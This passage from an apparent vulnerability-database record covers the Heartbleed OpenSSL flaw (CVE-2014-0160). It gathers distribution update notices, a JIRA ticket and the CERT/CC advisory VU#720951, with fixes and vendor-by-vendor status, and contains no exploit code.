(CVE-2014-0160).\n\n", "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "unix", "description": "[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "ELSA-2014-0376", "href": "http://linux.oracle.com/errata/ELSA-2014-0376.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "atlassian": [{"lastseen": "2019-05-29T17:29:00", "bulletinFamily": "software", "description": "{panel:bgColor=#e7f4fa}\n *NOTE:* This suggestion is for *JIRA Server*. Using *JIRA Cloud*? [See the corresponding suggestion|http://jira.atlassian.com/browse/JRACLOUD-38927].\n {panel}\n\n\r\n{quote}\r\n7 new vulnerabilities were announced for OpenSSL on 5 June 2014. These vulnerabilities affect Tomcat Native, which ships with the Windows Installer versions of JIRA.\r\n\r\nSo please update your JIRA Windows Installers to include a patched version of Tomcat Native DLL's, once these become available.\r\n{quote}\r\n\r\n*Note*\r\nThis is related to the Heartbleed vulnerability. Does not affect JIRA if recommended configuration is followed http://blogs.atlassian.com/2014/04/openssl-cve-2014-0160-atlassian/", "modified": "2018-02-08T06:54:15", "published": "2014-06-26T19:39:26", "id": "ATLASSIAN:JRASERVER-38927", "href": "https://jira.atlassian.com/browse/JRASERVER-38927", "title": "Update Tomcat Native DLL in JIRA Installer", "type": "atlassian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cert": [{"lastseen": "2019-10-09T19:49:28", "bulletinFamily": "info", "description": "### Overview \n\nOpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. This vulnerability is commonly referred to as \"heartbleed.\"\n\n### Description \n\nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2 beta through 1.0.2-beta1 contain a flaw in its implementation of the TLS/DTLS heartbeat functionality ([RFC6520](<https://tools.ietf.org/html/rfc6520>)). This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL libssl library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to increase the chances that a leaked chunk contains the intended secrets. The sensitive information that may be retrieved using this vulnerability include:\n\n * Primary key material (secret keys)\n * Secondary key material (user names and passwords used by vulnerable services)\n * Protected content (sensitive data used by vulnerable services)\n * Collateral (memory addresses and content that can be leveraged to bypass exploit mitigations)\n \nPlease see the [Heartbleed](<http://heartbleed.com/>) website for more details. Exploit code for this vulnerability is publicly available. Any service that supports STARTTLS (imap,smtp,http,pop) may also be affected. \n--- \n \n### Impact \n\nBy attacking a service that uses a vulnerable version of OpenSSL, a remote, unauthenticated attacker may be able to retrieve sensitive information, such as secret keys. By leveraging this information, an attacker may be able to decrypt, spoof, or perform man-in-the-middle attacks on network traffic that would otherwise be protected by OpenSSL. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [OpenSSL 1.0.1g](<http://www.openssl.org/news/secadv_20140407.txt>). Please contact your software vendor to check for availability of updates. Any system that may have exposed this vulnerability should regenerate any sensitive information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items. Old keys should be revoked. \n \nReports indicate that the use of `mod_spdy` can prevent the updated OpenSSL library from being utilized, as mod_spdy uses its own copy of OpenSSL. Please see <https://code.google.com/p/mod-spdy/issues/detail?id=85> for more details. \n \n--- \n \n**Disable OpenSSL heartbeat support** \n \nThis issue can be addressed by recompiling OpenSSL with the `-DOPENSSL_NO_HEARTBEATS` flag. Software that uses OpenSSL, such as Apache or Nginx would need to be restarted for the changes to take effect. \n \n**Use Perfect Forward Secrecy (PFS)** \n \n[PFS](<http://en.wikipedia.org/wiki/Forward_secrecy>) can help minimize the damage in the case of a secret key leak by making it more difficult to decrypt already-captured network traffic. However, if a ticket key is leaked, then any sessions that use that ticket could be compromised. Ticket keys may only be regenerated when a web server is restarted. \n \n--- \n \n### Vendor Information\n\n720951\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Amazon\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/>\n\n### __ Arch Linux\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugs.archlinux.org/task/39775>\n\n### __ Aruba Networks, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.arubanetworks.com/support/alerts/aid-040814.asc>\n\n### __ __ Attachmate\n\nUpdated: April 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0160 OpenSSL 'Heartbleed' vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available. \n \nAttachmate maintains the following technical note about affected and \nnon-vulnerable versions: \n<http://support.attachmate.com/techdocs/2724.html> \n \nIn addition, Security Updates technical notes are also available for \nspecific \nproducts: \nSecurity Updates and Reflection for the Web or Reflection Security Gateway \n<http://support.attachmate.com/techdocs/1704.html> \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! \n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and INFOConnect \n<http://support.attachmate.com/techdocs/2546.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.attachmate.com/techdocs/2724.html>\n * <http://support.attachmate.com/techdocs/1704.html>\n * <http://support.attachmate.com/techdocs/1708.html>\n * <http://support.attachmate.com/techdocs/2288.html>\n * <http://support.attachmate.com/techdocs/2501.html>\n * <http://support.attachmate.com/techdocs/2502.html>\n * <http://support.attachmate.com/techdocs/2546.html>\n * <http://support.attachmate.com/techdocs/2700.html>\n\n### __ __ Bee Ware\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\ni-Suite versions 5.4.0 and above, up to version 5.5.4, are vulnerable. Versions 5.2.8 and 5.3.x are not vulnerable.\n\n### Vendor References\n\n * <http://documentation.bee-ware.net/display/SECU/CVE-2014-0160+-+OpenSSL+Heartblee\nd+Bug>\n\n### __ Blue Coat Systems\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.bluecoat.com/index?page=content&id=SA79](<http://kb.bluecoat.com/index?page=content&id=SA79>)\n\n### __ CA Technologies\n\nNotified: April 08, 2014 Updated: April 25, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={967F13F1-5720-4592-9BEB-42AD69EA14DC}>\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={7EBD736F-0227-4AEB-A7A9-9C5A4EA449C3}>\n\n### __ Cisco Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 10, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed>\n\n### __ Debian GNU/Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2014/dsa-2896>\n\n### __ __ Extreme Networks\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nThe following products and versions are affected by the VU#720951 OpenSSL vulnerability.\n\nExtremeXOS version 15.4.1.x - A patch update for ExtremeXOS 15.4.1.3-patch1-10 or higher is available for download \n \n64 bit (Ubuntu) NetSight Appliance version 4.4, 5.0, 5.1 and 6.0 - A patch update is currently available for 4.4, 5.0, 5.1 and 6.0 \n \n64 bit (Ubuntu) NAC Appliance version 5.0, 5.1 and 6.0 - A patch update is currently available for 5.0, 5.1 and 6.0. \n \n64 bit (Ubuntu) Purview Appliance version 6.0 - A patch update is currently available. \n \nNote: Please contact the Extreme Networks Global Technical Assistance Center (GTAC) for access to the patch in the event not found on the Extreme Networks support site. \n \nExtreme Networks has also published the below advisory on its website. Please refer the same for additional information. \n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### __ F5 Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217>\n\n### __ Fedora Project\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ __ Fortinet, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe have determined that the following products are vulnerable:\n\nFortiGate (FortiOS) 5.0 and higher \nFortiAuthenticator 3.0 and higher \nFortiMail 5.0 and higher \nFortiVoice (all versions) \nFortiRecorder (all versions)\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-011/>\n\n### __ __ FreeBSD Project\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nFreeBSD 10.0-RELEASE, 10.0-STABLE and 11.0-CURRENT have been patched\n\nfor this issue (CVE-2014-0160/VU #720951), both in source and binary \n(via freebsd-update) forms. Earlier FreeBSD releases are not affected \nby this issue.\n\n### Vendor References\n\n * <http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc>\n\n### __ Gentoo Linux\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml>\n\n### __ __ Global Technology Associates, Inc.\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n**Statement Date: April 23, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version.\n\nGB-OS version 6.1.0 to 6.1.5 are vulnerable and should upgrade to GB-OS 6.1.6 \nGB-OS version 6.0.0 to 6.0.7 are vulnerable and should upgrade to GB-OS 6.0.8 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Google\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html>\n * <https://groups.google.com/forum/?_escaped_fragment_=topic/mod-spdy-discuss/EwCowyS1KTU#!topic/mod-spdy-discuss/EwCowyS1KTU>\n\n### Addendum\n\nmod_spdy is affected, as are some versions of the Google Search Appliance GSA 7.0.14.G.212 addresses this issue.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Hewlett-Packard Company\n\nNotified: April 08, 2014 Updated: May 02, 2014 \n\n**Statement Date: April 14, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://h17007.www1.hp.com/docs/advisories/HPNetworkingSecurityAdvisory-OpenSSL-HeartbleedVulnerability.pdf>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04240206>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04242672>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239374>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04255796>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260353>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260456>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260505>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262472>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262670>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04261644>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n\n### __ __ Hitachi\n\nNotified: April 08, 2014 Updated: May 27, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Hitachi has published the below advisory on its website. Please refer \nthe advisory for additional information. This advisory includes \nHitachi products for Industrial Control Platform. \n \nHIRT-PUB14005: OpenSSL TLS heartbeat extension read overrun issue in \nHitachi products (VU#720951, CVE-2014-0160) \n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>\n\n### __ IBM Corporation\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc>\n * [http://www-01.ibm.com/support/docview.wss?&uid=swg21669774](<http://www-01.ibm.com/support/docview.wss?&uid=swg21669774>)\n\n### __ Intel Corporation\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n**Statement Date: April 15, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr](<https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr>)\n\n### __ Juniper Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://kb.juniper.net/JSA10623>\n\n### __ Mandriva S. A.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ MarkLogic Corporation\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`Recently a serious security vulnerability was discovered in the OpenSSL \ncryptographic software \nlibrary. MarkLogic application servers can be configured to use SSL, and \nMarkLogic uses OpenSSL to \nprovide this capability. A patch to OpenSSL has been released to address \nthis vulnerability, and \nMarkLogic has built patches for all impacted MarkLogic versions with \nOpenSSL 1.0.1g to incorporate \nthis new fix. \n \n \n \nImpacted Versions \n \n \n \nThe following versions of MarkLogic are impacted by this vulnerability: \n \n\u00b7 MarkLogic 5.0-5 through 5.0-6 \n \n\u00b7 All versions of MarkLogic 6.0 (6.0-1 through 6.0-5) \n \n\u00b7 All versions of MarkLogic 7.0 (7.0-1 through 7.0-2.2), \nincluding the MarkLogic AMIs \n \n \n \nMarkLogic versions prior to 5.0-5 use an earlier version of OpenSSL that \ndoes not have this \nvulnerability. \n \n \n \nHow to Patch \n \n \n \nWe recommend that customers who are using SSL patch their systems \nimmediately. To do this: \n \n1. Upgrade your cluster to the patch release, available at \n<http://developer.marklogic.com/products>. \n \nPatch release versions are as follows: \n \no MarkLogic 5.0-6.1 \n \no MarkLogic 6.0-5.1 \n \no MarkLogic 7.0-2.3 \n \n2. Regenerate all SSL certificates for your cluster. This is \nnecessary because the \nvulnerability is such that private keys for your certificates are \npotentially compromised. See \n\ud840\uddcconfiguring SSL on App Servers\u201d in the documentation: \n \no MarkLogic 5 documentation: \n<http://docs.marklogic.com/5.0/guide/admin/SSL#chapter> \n \no MarkLogic 6 documentation: \n<http://docs.marklogic.com/6.0/guide/admin/SSL#chapter> \n \no MarkLogic 7 documentation: \n<http://docs.marklogic.com/guide/admin/SSL#chapter> \n \n3. If you are using BASIC or Application Level Authentication over \nSSL, have all your \nusers change their passwords after you've patched and deployed new SSL \ncertificates. This includes \nboth internal users in our security database, and anyone using external \nauthentication (which \nrequires BASIC authentication over SSL). This is necessary because the \nvulnerability may have \nresulted in password leaks. \n \n \n \nIf you have any questions about how to patch, feel free to contact \nsupport@marklogic.com. \n \n \n \nMore information about the heartbleed vulnerability can be found at \n<http://heartbleed.com> or \n<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>.`\n\n### __ McAfee\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 11, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10071](<https://kc.mcafee.com/corporate/index?page=content&id=SB10071>)\n\n### __ __ NVIDIA\n\nUpdated: May 05, 2014 \n\n**Statement Date: May 05, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n<http://nvidia.custhelp.com/app/answers/detail/a_id/3492>\n\n### __ __ NetBSD\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNetBSD is vulnerable (in the version 6 train, not in the version 5 train) pkgsrc is vulnerable (1.0.1 versions of OpenSSL packages below 1.0.1g, no surprises there)\n\n### Vendor References\n\n * <http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html>\n\n### __ OpenBSD\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/002_openssl.patch.sig>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/007_openssl.patch>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.3/common/014_openssl.patch>\n\n### __ OpenSSL\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.openssl.org/news/secadv_20140407.txt>\n\n### __ OpenVPN Technologies\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.openvpn.net/openvpn/wiki/heartbleed>\n\n### __ Oracle Corporation\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>\n\n### __ Red Hat, Inc.\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0160>\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ Slackware Linux Inc.\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622>)\n\n### __ Sophos, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/>\n\n### __ Symantec\n\nNotified: April 08, 2014 Updated: May 13, 2016 \n\n**Statement Date: April 18, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.symantec.com/outbreak/?id=heartbleed>\n * <http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf>\n * [https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00](<https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00>)\n\n### Addendum\n\nCERT/CC has confirmed with Symantec that Symantec Messaging Gateway version 10.6.1 is vulnerable. Please see the most recent Symantec advisory (`SYM16-007`) above.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Ubuntu\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1304042>\n\n### Addendum\n\nNote that the version number reported by openssl does not reflect the patch level. To verify that the usn-2165-1 fixed versions are installed, run the following command \n`dpkg -l openssl libssl* | cat` \nand compare the reported version numbers with those listed in the advisory.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Unisys\n\nNotified: April 08, 2014 Updated: April 17, 2014 \n\n**Statement Date: April 17, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n**Heartbleed bug \u2013 Public and Client Communication**\n\nDear Unisys client,\n\nUnisys prides itself on ensuring the mission-critical operations of our clients \u2013 and the security of your systems is a priority for us. I am writing to let you know how we are addressing any risks related to the Heartbleed bug that has been reported in the news and to provide you with information that may help you address your own risks.\n\nHeartbleed is a software bug in the OpenSSL technology used to create a secure link over the Internet between a server and a computer asset such as a laptop or PC. The bug, which has existed for about two years but was only publicly disclosed last week, is believed to have affected a significant number of websites globally. \n\nUnisys has undertaken a comprehensive review of our servers, products, and client-owned servers under our management for risks associated with the Heartbleed bug. Here\u2019s what you need to know:\n\n-We have not found any vulnerability in our public-facing Web servers. We continue to monitor the product advisories of our major vendors for any potential issues. \n\n\n-The vast majority of our released products, including MCP, OS 2200, Forward!, Stealth, and Choreographer, are not vulnerable to the Heartbleed bug. Two instances of potential vulnerabilities were found in add-on products; in those cases, we have done remediation efforts and notified clients. \n\n\n-The vast majority of client-owned servers under our management are not affected by the Heartbleed bug. For servers that may have been affected, we have notified the client and after consulting with the client, we are in the process of patching those servers, changing the server side certificates and instructing users to change their passwords. \n\n\n-Currently, only version 1.0.1 - 1.0.1f of the open-source SSL is affected. We have upgraded any client-owned servers under our management to version 1.0.1g. We recommend that you check the other servers that you manage. \n\n\n-Our Security Services team can help you in this process and can also perform a penetration test to determine if you are vulnerable and help you contain any resulting damage.\n\nWe stand ready to assist you. Please contact your Unisys representative or service delivery manager to discuss your requirements or to order a penetration test.\n\nWe appreciate your business.\n\nUnisys\n\n### __ __ VMware\n\nNotified: April 08, 2014 Updated: April 22, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nVMware has released product updates and patches for all affected products\n\nlisted in VMware Knowledge Base article 2076225.\n\n### Vendor Information\n\nVMware Security Advisory VMSA-2014-0004 lists the updated products and \npatch releases that address CVE-2014-0160 in VMware products and provides \nreferences to specific product documentation.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2014-0004.html>\n * <http://kb.vmware.com/kb/2076225>\n\n### __ Watchguard Technologies, Inc.\n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * 